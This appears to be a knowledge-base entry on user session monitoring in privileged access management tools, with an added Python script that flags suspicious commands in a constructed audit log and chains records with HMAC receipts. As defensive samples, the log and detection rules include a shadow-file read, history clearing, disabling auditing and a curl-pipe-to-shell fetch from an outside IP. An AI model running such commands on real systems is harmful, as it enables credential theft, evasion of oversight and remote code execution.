User Session Monitoring
A potential place for this concept is under Platform Monitoring, though it may belong under another Detect area.
Digital Artifacts
- Log
- Network Traffic (or an artifact that encompasses GUI desktop capture, analogous to Web Network Traffic)
Definition
User sessions can be monitored live or retroactively in a number of ways, including authentication events (logon/logoff), system logs, keystroke logging and command history, user behavior analytics, and screen capture (video or screenshots).
How it works
Some PAM tools (and some tools of other kinds) capture user actions through the methods listed in the definition in order to monitor privileged activity; graphical recording of RDP sessions is a typical example. Recordings serve auditing when a privileged user's session includes actions that indicate misuse, the unintentional introduction of a vulnerability, and so on. They may also be used to observe a threat actor in the act without their knowledge, although this is an edge case. More generally, session monitoring supports non-repudiation: a user cannot credibly deny actions that were recorded, provided the record is protected from tampering and tied to an authenticated identity. PAM tools that perform graphical capture usually achieve this by routing the session's network traffic through a proxy node that has the resources to handle the recording. PAM tools that perform log and command monitoring can ship their data to a SIEM, but they also typically provide their own interfaces for filtering activity, so that PAM administrators can terminate sessions that look suspicious.
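The command-filtering and session-termination workflow, together with the non-repudiation point, as an added example that is not part of the original issue and is not code from any PAM product: a Python script that parses a constructed command-audit stream, flags sessions whose commands match suspicious patterns, decides which sessions an administrator would terminate, and chains each session's records with an HMAC so that the resulting receipt changes if any recorded command is altered, removed or reordered. The audit line format, the detection rules, the session identifiers, host names and the recorder key are all assumptions made for this example.

```python
"""Added example (not code from any PAM product or from this page's author):
filter a constructed PAM command-audit stream for suspicious privileged
sessions and derive a tamper-evident receipt per session.

Assumptions made for this example:
  * the audit line format "<epoch> <session_id> <user> <host> <command>";
    real products use their own schemas;
  * the detection rules, which are illustrative, not a vendor's rule set;
  * a recorder-held HMAC key (RECORDER_KEY) used to chain the records.
"""
import hashlib
import hmac
import re

# Constructed sample audit stream (three sessions, one benign).
SAMPLE_LOG = """\
1700000000 s-101 alice db01 sudo systemctl status postgresql
1700000005 s-101 alice db01 sudo tail -n 50 /var/log/postgresql/postgresql.log
1700000010 s-102 bob jump01 cat /etc/shadow
1700000012 s-102 bob jump01 history -c
1700000020 s-103 carol web01 sudo auditctl -e 0
1700000025 s-103 carol web01 curl -s http://203.0.113.7/x.sh | sh
"""

# Illustrative rules: (name, pattern matched against the command text).
RULES = [
    ("credential-file-read", re.compile(r"/etc/g?shadow\b")),
    ("history-clear", re.compile(r"\bhistory\s+-c\b|\bunset\s+HISTFILE\b")),
    ("audit-disable", re.compile(r"\bauditctl\s+-e\s+0\b|\bsystemctl\s+(stop|disable)\s+auditd\b")),
    ("remote-pipe-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
]

RECORDER_KEY = b"example-recorder-key"  # assumption: held only by the recording node


def parse_events(text: str) -> list[dict]:
    """Parse audit lines into events; malformed lines are skipped, not guessed."""
    events = []
    for raw in text.splitlines():
        parts = raw.split(" ", 4)
        if len(parts) != 5 or not parts[0].isdigit():
            continue
        ts, sid, user, host, cmd = parts
        events.append({"ts": int(ts), "session": sid, "user": user,
                       "host": host, "cmd": cmd, "raw": raw})
    return events


def classify(cmd: str) -> list[str]:
    """Return the names of every rule the command triggers, in rule order."""
    return [name for name, pat in RULES if pat.search(cmd)]


def session_receipt(events: list[dict], key: bytes) -> str:
    """Tamper-evident hash chain over a session's events in recorded order.

    Each link is an HMAC over the previous link and the raw line, so editing,
    deleting or reordering any recorded command changes the final digest. The
    recorder keeps `key`; an auditor recomputes the chain to verify the record.
    """
    link = bytes(32)  # fixed genesis value for the first link
    for ev in sorted(events, key=lambda e: e["ts"]):
        link = hmac.new(key, link + ev["raw"].encode(), hashlib.sha256).digest()
    return link.hex()


def review_sessions(text: str, key: bytes = RECORDER_KEY) -> dict:
    """Group events by session, collect rule hits, and decide on termination."""
    by_session: dict[str, list[dict]] = {}
    for ev in parse_events(text):
        by_session.setdefault(ev["session"], []).append(ev)

    report = {}
    for sid, evs in by_session.items():
        hits: list[str] = []
        for ev in evs:
            for name in classify(ev["cmd"]):
                if name not in hits:
                    hits.append(name)
        report[sid] = {
            "user": evs[0]["user"],
            "host": evs[0]["host"],
            "commands": len(evs),
            "hits": hits,
            # Policy for this example: any hit is grounds to cut the session.
            "terminate": bool(hits),
            "receipt": session_receipt(evs, key),
        }
    return report


if __name__ == "__main__":
    for sid, info in review_sessions(SAMPLE_LOG).items():
        action = "TERMINATE" if info["terminate"] else "ok"
        print(f"{sid} {info['user']}@{info['host']} {action} "
              f"hits={info['hits']} receipt={info['receipt'][:16]}...")
```

Running the script prints one line per session with the termination decision and a truncated receipt. The receipt only gives non-repudiation if the key stays with the recording node rather than with the users being recorded, and in a real deployment the final digest would be anchored somewhere the recorder cannot silently rewrite (for instance, forwarded to the SIEM alongside the records) rather than kept only beside the data it protects.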
Considerations
When using this feature the following should be considered:
- Keystroke-logging features deployed for defensive purposes can be turned to offensive use if the monitoring system is compromised, since the captured keystrokes include whatever credentials and secrets were typed into the monitored sessions.
- Video screen capture is very expensive in terms of storage, bandwidth, and potentially CPU/GPU resources.
References
There are other examples of this but here is one: https://docs.delinea.com/online-help/secret-server/session-recording/session-rec-overview.htm